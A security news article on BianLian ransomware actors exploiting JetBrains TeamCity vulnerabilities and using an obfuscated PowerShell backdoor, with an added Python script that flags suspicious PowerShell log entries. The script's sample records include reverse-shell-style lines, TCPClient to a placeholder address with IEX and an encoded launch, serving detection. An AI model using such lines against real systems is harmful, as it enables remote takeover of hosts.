BianLian Threat Actors Utilize JetBrains TeamCity Vulnerabilities in Ransomware Assaults

March 11, 2024

BianLian ransomware actors have been identified exploiting security vulnerabilities in JetBrains TeamCity software to execute their ransom-focused attacks. GuidePoint Security's new report, published in response to a recent breach, reveals that the incident began with the exploitation of a TeamCity server, leading to the deployment of a PowerShell implementation of BianLian's Go backdoor.

BianLian came into existence in June 2022, and following the release of a decryptor in January 2023, it has shifted its focus exclusively towards exfiltration-based extortion. GuidePoint Security observed an attack chain that starts with the exploitation of a susceptible TeamCity instance using either CVE-2024-27198 or CVE-2023-42793 to gain initial access. This is followed by the creation of new users on the build server and the execution of malicious commands for post-exploitation and lateral movement. It remains uncertain which of the two vulnerabilities was utilized by the threat actor for infiltration.

Known for their custom backdoor written in Go, tailored to each victim, the BianLian actors also drop remote desktop tools such as AnyDesk, Atera, SplashTop, and TeamViewer. Microsoft has tracked this backdoor as BianDoor. Justin Timothy, Gabe Renfro, and Keven Murphy, security researchers, stated, 'After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor.'

The obfuscated PowerShell backdoor, referred to as 'web.ps1', is designed to create a TCP socket for further network communication to a server controlled by the actor, permitting the remote attackers to perform arbitrary actions on an infected host. The researchers added, 'The now-confirmed backdoor is able to communicate with the [command-and-control] server and asynchronously execute based on the remote attacker's post-exploitation objectives.'
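The traits the researchers describe for 'web.ps1' (a raw TCP socket to an actor-controlled server, combined with obfuscation and dynamic execution) are exactly what a defender can look for in PowerShell Script Block Logging (Event ID 4104). The following is an added example, not code from GuidePoint's report or from the BianLian tooling: it scores constructed sample script-block records against a small set of indicators, decoding any `-EncodedCommand` payload first so that base64 encoding alone cannot hide the socket/IEX combination. Hostnames, the 203.0.113.5 address, the indicator weights and the alert threshold are all assumptions made for the illustration.

```python
import base64
import re

# Constructed sample records in the shape of PowerShell Script Block Logging
# (Event ID 4104) entries; hosts and addresses are placeholders, not IoCs.
SAMPLE_EVENTS = [
    {"id": 1, "host": "build01",
     "text": "Get-ChildItem C:\\BuildAgent\\work | Sort-Object LastWriteTime"},
    {"id": 2, "host": "build01",
     "text": "$c=New-Object System.Net.Sockets.TCPClient('203.0.113.5',443);"
             "$s=$c.GetStream();IEX ([Text.Encoding]::ASCII.GetString($b,0,$i))"},
    {"id": 3, "host": "build02",
     # An -EncodedCommand launch: PowerShell expects base64 of UTF-16LE text.
     "text": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object System.Net.Sockets.TCPClient('203.0.113.5',443))"
         .encode("utf-16le")).decode("ascii")},
    {"id": 4, "host": "build02",
     "text": "Test-NetConnection -ComputerName updates.example.test -Port 443"},
]

# Indicator name -> (regex, weight). Weights are illustrative, not a vendor scale.
INDICATORS = {
    "raw_tcp_socket": (re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 3),
    "dynamic_exec":   (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "stream_io":      (re.compile(r"\.GetStream\(\)", re.I), 1),
    "encoded_launch": (re.compile(r"-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 1),
}
ALERT_THRESHOLD = 4  # assumed cut-off: socket + dynamic execution is enough to alert

ENC_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload if one is present, else ''."""
    m = ENC_RE.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event):
    """Return (score, [indicator names]) for one script-block record."""
    # Scan both the raw block and any decoded -enc payload, so encoding the
    # command does not hide the socket/IEX combination from the indicators.
    views = [v for v in (event["text"], decode_encoded_command(event["text"])) if v]
    hits, score = [], 0
    for name, (rx, weight) in INDICATORS.items():
        if any(rx.search(v) for v in views):
            hits.append(name)
            score += weight
    return score, hits


def analyze(events, threshold=ALERT_THRESHOLD):
    """Return findings for records whose indicator score meets the threshold."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append({"id": ev["id"], "host": ev["host"],
                             "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['id']} on {f['host']}: score {f['score']} {f['indicators']}")
```

Run against the sample records, events 2 and 3 are flagged (the plain and the encoded socket-plus-IEX blocks) while the benign build and connectivity-check commands score zero. On a real build server the same logic would be fed from the `Microsoft-Windows-PowerShell/Operational` log; a raw `TCPClient` in a build script is unusual enough that the hit itself, not just the score, is worth a look, and pairing it with TeamCity's own audit trail for unexpected user creation covers the earlier step of the chain described above.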

The revelation comes as new proof-of-concept (PoC) exploits for a critical security flaw affecting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) have been detailed. This flaw could lead to remote code execution in a fileless manner and load the Godzilla web shell directly into memory. Over the past two months, this flaw has been weaponized to deploy C3RB3R ransomware, cryptocurrency miners, and remote access trojans, indicating broad exploitation in the wild.
